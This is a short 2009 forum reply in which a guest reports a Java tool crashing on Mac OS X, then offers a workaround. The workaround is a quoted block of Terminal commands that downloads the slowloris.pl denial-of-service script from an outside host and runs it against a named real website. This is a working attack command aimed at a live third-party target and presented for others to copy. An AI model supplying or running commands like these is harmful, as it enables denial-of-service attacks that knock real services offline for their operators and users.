View Single Post
Old 06-30-2009   #4 (permalink)
Unregistered
Guest
 
Posts: n/a
Default

It doesn't work on osx 10.5.6

I get these error in the console:

.com.apple.JarLauncher[340]: Exception in thread "main"
[0x0-0x26026].com.apple.JarLauncher[340]: java.lang.NoClassDefFoundError: javax/swing/GroupLayout$Group
[0x0-0x2a02a].com.apple.JarLauncher[347]: Exception in thread "main"
[0x0-0x2a02a].com.apple.JarLauncher[347]: java.lang.NoClassDefFoundError: javax/swing/GroupLayout$Group

for the moment I'm using slowloris:

"
To run slowloris.pl on Mac OS X, open Terminal and type this (hit return at the end of each line):

mkdir -p ~/Source && cd ~/Source/
curl -O http://ha.ckers.org/slowloris/slowloris.pl
chmod +x slowloris.pl
./slowloris.pl --dns www.gerdab.ir
"
  Reply With Quote